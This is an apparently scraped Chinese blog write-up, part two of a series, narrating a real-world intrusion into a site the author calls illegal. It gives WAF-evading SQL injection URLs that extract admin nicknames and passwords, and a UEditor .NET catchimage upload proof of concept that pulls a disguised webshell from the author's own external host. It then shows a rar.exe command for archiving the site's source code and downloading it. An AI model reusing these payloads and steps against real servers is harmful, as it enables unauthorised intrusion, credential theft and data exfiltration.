记一次对某非法站点从SQL注入到整站打包与本地搭建全过程( 二 ) _SQL注入

文章插图

和前面获取到的表总个数是一致的。
解下来就是获取memberadmin表中的列名与内容，但在此之前我还是习惯性的看了下后台的网页源代码。

文章插图

如图，盲猜列名txt_nickname、nickname、txt_password、password

/goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0bnickname%0bfrom%0bmemberadmin)--%20*/

文章插图

/goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0bpassword%0bfrom%0bmemberadmin)--%20*/
四.后台getshell
登陆后台

文章插图

经测试后发现信息管理处可以发布咨询，上传图片。通过修改去掉filename=”1.aspx”中的双引号绕过安全狗，但无法绕过程序自身的检测。

<form action="http://***/***/net/controller.ashx?action=catchimage"enctype="Application/x-www-form-urlencoded" method="POST"><p>shell addr:<input type="text" name="source[]" /></p ><input type="submit" value=https://www.isolves.com/it/aq/fwq/2020-03-01/"Submit" />

不过得知上传组件为ueditor，且.net版本存在上传漏洞
poc如下

<form action="http://***/***/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"><p>shell addr:<input type="text" name="source[]" /></p ><input type="submit" value=https://www.isolves.com/it/aq/fwq/2020-03-01/"Submit" />

并在自己的服务器上准备好shell（注意过狗），名称为a.gif,然后填入shell地址

https://o0o0.club/a.gif?.aspx

文章插图

提交后即可得到shell路径

五、打包源码与数据库
在有了shell之后要做的事情就更明确了，即是打包源码与数据库，由于只需要这两样操作，相对于不需要太大的权限，避免操作不当触发警告。因此我选择先通过shell来进行打包操作。

文章插图

文章插图

源码
这里利用的是自行上传的rar.exe来分卷打包源码，在此之前尝试过7z.exe（目标服务器上已安装）、makecab 但效果并不理想，姿势不够还望科普。
1234567

rar.exe a -r -v50m -m5 pan20170823 *.*#a 压缩#-r 打包子目录#-v 分卷大小#-m 压缩等级#pan20170823目标目录#*.* 打包后文件名为 pan20170823.part*.rar

最终以每秒100k的速度下载完成。

文章插图

数据库
略过，后台自带备份功能
坑点：后台的备份文件后缀为zip，下载回来总是提示文件损坏，一直以为备份功能有问题，后来发现文件头是TAPE 。。。。

六、本地搭建
本地搭建的环境为 windows server 2012+IIS8+SQL Server 2008,简单讲讲0.0

SQL Server
安装过程略过导入数据
新建数据库，然后通过原设备还原数据